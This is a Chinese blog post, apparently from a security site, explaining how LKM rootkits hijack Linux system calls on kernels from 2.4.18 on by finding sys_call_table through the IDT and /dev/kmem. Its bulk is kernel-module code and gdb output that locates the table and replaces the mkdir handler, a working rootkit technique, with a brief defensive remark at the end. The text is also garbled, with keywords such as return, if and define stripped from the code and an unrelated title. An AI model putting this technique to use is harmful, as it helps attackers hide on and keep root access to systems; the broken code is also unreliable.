ff调用ie内核:Linux2.4.18内核下基于LKM的系统调用劫持

on 2009-9-12 in 安全 | 0 Comment
注:本文提到思路方法和窍门技巧如有兴趣请参考后面提到两篇参考文章虽然比较老了但是对于本文内容实现有很大参考价值篇幅关系没有列出完整代码但是核心代码已经全部给出
Linux现在使用是越来越多了因此Linux安全问题现在也慢慢为更多人所关注Rootkit是攻击者用来隐藏踪迹和保留root访问权限工具集在这些工具当中基于LKMrootkit尤其受到关注这些rootkit可以实现隐藏文件、隐藏进程、重定向可执行文件给linux安全带来很大威胁它们所用到技术主要是系统劫持用LKM技术截获系统通常步骤如下:
找到需要系统在sys_call_table入口(参考/sys/syscall.h)
保存sys_call_table[x]旧入口指针(x代表所想要截获系统索引)
将自定义指针存入sys_call_table[x]
在Linux2.4.18内核以前可以将sys_call_table导出来直接使用因此修改系统非常容易下面看个例子:
extern void* sys_call_table;/*sys_call_table被引入所以可以存取*/
(*orig_mkdir)(const char *path); /*保存原始系统指针*/
hacked_mkdir(const char *path)
{
0; /*切正常除了新建操作该操作什么也不做*/
}
init_module(void) /*化模块*/
{
orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hacked_mkdir;
0;
}
void cleanup_module(void) /*卸载模块*/
{
sys_call_table[SYS_mkdir]=orig_mkdir; /*恢复mkdir系统到原来那个*/
}
在Linux2.4.18内核以后为了解决这个安全问题sys_call_table不能直接导出因此上面这个代码拿到Linux2.4.18内核的后内核上去编译加载会在加载时报错那么要如何样才能得到sys_call_table实现系统劫持呢?
.如何样得到sys_call_table地址
1./dev/kmem
先看下来自Linux手册页(man kmem)介绍:“kmem是设备文件是计算机主存个影象它可以用于测试甚至修改系统”也就是说读取这个设备可以得到内存中数据因此sys_call_table地址也可以通过设备找到这个设备通常只有root用户才有rw权限因此只有root才能实现这些操作
2.系统过程简述
个系统都是通过 0x80中断进入核心中断描述符表把中断服务和中断向量对应起来对于系统来说操作系统会system_call中断服务system_call在系统表中根据系统号找到并相应系统服务例程
3.得到sys_call_table地址过程
idtr寄存器指向中断描述符表起始地址用sidt[asm ("sidt %0" : "=m" (idtr));]指令得到中断描述符表起始地址从这条指令中得到指针可以获得 0x80中断服描述符所在位置然后计算出system_call地址现在反编译下system_call下:
$ gdb -q /usr/src/linux/vmlinux
(no debugging symbols found)...(gdb) disass system_call
Dump of assembler code for function system_call:
……
0xc0106bf2 <system_call+42>: jne 0xc0106c48 <tracesys>
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4)
0xc0106bfb <system_call+51>: mov %eax,0x18(%esp,1)
0xc0106bff <system_call+55>: nop
End of assembler dump.
(gdb) pr &sys_call_table
$1 = (<data variable, no debug info> *) 0xc01e0f18
(gdb) x/xw (system_call+44)
0xc0106bf4 <system_call+44>: 0x188514ff <-- 得到机器指令 (little endian)
(gdb)
我们可以看到在system_call是用call *0xc01e0f18指令来系统因此只要找到system_call里call sys_call_table(,eax,4)指令机器指令就可以了我们使用模式匹配方式来获得这条机器指令地址这样就必须读取/dev/kmem里面数据
2.如何在module里使用标准系统
处理/dev/kmem里数据只需要用标准系统就可以了如:open,lseek,read
但module里不能使用标准系统为了在module里使用标准系统我们要在module里实现系统看看内核源代码里实现吧:
# __syscall_(type, res) \
do { \
     ((unsigned long)(res) >= (unsigned long)(-125)) { \
        errno = -(res); \
        res = -1; \
    } \
     (type) (res); \
} while (0)
# _syscall1(type,name,type1,arg1) \
type name(type1 arg1) \
{ \
long __res; \
__asm__ volatile (" $0x80" \
    : "=a" (__res) \
    : "0" (__NR_##name),"b" ((long)(arg1))); \
__syscall_(type,__res); \
}
inline _syscall1(,close,,fd)
我们可以学习这样思路方法这样只要将这些代码加入到我们module代码里面就可以在module里使用这些标准系统
另外为了用匹配搜索方式查找sys_call_table地址我们可以用memmem不过memmem是GNU C扩展原型是:void *memmem(void *s, s_len,void *t, t_len);同样module里也不能使用库但是我们可以自己实现这个
然而在module里使用标准系统还有个问题系统需要参数要求要在用户空间而不是在module所在内核空间
Linux使用了段选器来区分内核空间、用户空间等等被系统所用到而存放在用户空间中参数应该在数据段选器(所指)范围某个地方DS能够用asm/uaccess.h中get_ds得到只要我们把被内核用来指向用户段段选器设成所需要 DS值我们就能够在内核中访问系统所用到(那些在用户地址空间中)那些用做参数值数据这可以通过_fs(...)来做到但要小心访问完系统参数后定要恢复FS下面是段例子:
filename内核空间;比如说我们刚创建了个字串
unsigned long old_fs_value=get_fs;
_fs(get_ds); /*完成的后就可以存取用户空间了*/
open(filename, O_CREAT|O_RDWR|O_EXCL, 0640);
_fs(old_fs_value); /*恢复 fs ...*/
3.在module里实现sys_call_table地址查找代码实现
主要代码如下:
/*实现系统*/
unsigned long errno;
# __syscall_(type, res) \
do { \
     ((unsigned long)(res) >= (unsigned long)(-125)) { \
        errno = -(res); \
        res = -1; \
    } \
     (type) (res); \
} while (0)
# _syscall1(type,name,type1,arg1) \
type name(type1 arg1) \
{ \
long __res; \
__asm__ volatile (" $0x80" \
    : "=a" (__res) \
    : "0" (__NR_##name),"b" ((long)(arg1))); \
__syscall_(type,__res); \
}
# _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile (" $0x80" \
    : "=a" (__res) \
    : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
         "d" ((long)(arg3))); \
__syscall_(type,__res); \
}
inline _syscall3(,write,,fd,const char *,buf,off_t,count)
inline _syscall3(,read,,fd,char *,buf,off_t,count)
inline _syscall3(off_t,lseek,,fd,off_t,off,,count)
inline _syscall3(,open,const char *,file,,flag,,mode)
inline _syscall1(,close,,fd)
/*从这里以后就可以使用这几个系统了*/

struct {
unsigned limit;
unsigned base;
} __attribute__ ((packed)) idtr;
struct {
unsigned off1;
unsigned sel;
unsigned char none,flags;
unsigned off2;
} __attribute__ ((packed)) idt;
kmem;
void readkmem (void *m,unsigned off, sz)
{
    mm_segment_t old_fs_value=get_fs;
_fs(get_ds);    
(lseek(kmem,off,0)!=off) {
prk("kmem lseek error in read\n"); ;
}
(read(kmem,m,sz)!=sz) {
prk("kmem read error!\n"); ;
}
    _fs(old_fs_value);
}
# CALLOFF 100 /* 我们将读出 $0x80头100个字节 */
/*得到sys_call_table地址*/
unsigned getscTable
{
unsigned sct;
unsigned sys_call_off;
char sc_asm[CALLOFF],*p;
/* 获得IDTR寄存器值 */
asm ("sidt %0" : "=m" (idtr));
     mm_segment_t old_fs_value=get_fs;
     const char *filename="/dev/kmem";
     _fs(get_ds);
/* 打开kmem */
kmem = open (filename,O_RDONLY,0640);
(kmem<0)
     {
            prk("open error!");
     }
     _fs(old_fs_value);
/* 从IDT读出0x80向量 (syscall) */
readkmem (&idt,idtr.base+8*0x80,(idt));
sys_call_off = (idt.off2 << 16) | idt.off1;
/* 寻找sys_call_table地址 */
readkmem (sc_asm,sys_call_off,CALLOFF);
p = (char*)mymem (sc_asm,CALLOFF,"\xff\x14\x85",3);
sct = *(unsigned*)(p+3);
     close(kmem);
         sct;
}
好了但是上面没有做足够检查
4.劫持系统
在得到了sys_call_table地址后我们就可以很轻易劫持系统
我们把最开始那个例子修改让它运行在2.4.18内核
系统劫持过程主要代码如下:
unsigned SYS_CALL_TABLE_ADDR;
void **sys_call_table;
init_module(void)
{
SYS_CALL_TABLE_ADDR= getscTable;
    sys_call_table=(void **)SYS_CALL_TABLE_ADDR;
    orig_mkdir=sys_call_table[__NR_mkdir];
    sys_call_table[__NR_mkdir]=hacked_mkdir;
     0;    
}
void cleanup_module(void)
{
    sys_call_table[__NR_mkdir]=orig_mkdir;
}
5.综述
虽然内核2.4.18以后不再导出sys_call_table但是我们仍然可以通过读/dev/kmem设备文件得到它地址来实现系统劫持要解决这个问题最好是使/dev/kmem不可读或者干脆不使用这个设备文件否则总会给安全带来隐患
参考资料:
Phrack58-0x07 Linux _disibledevent=>


  • 篇文章: 黑客SQL服务器入侵实战演习( 5)

  • 篇文章: 我所知道管理员在上传方面部分设计漏洞
    • Tags:  linux内核编译 深入理解linux内核 linux内核 ff调用ie内核

    延伸阅读

    最新评论

    发表评论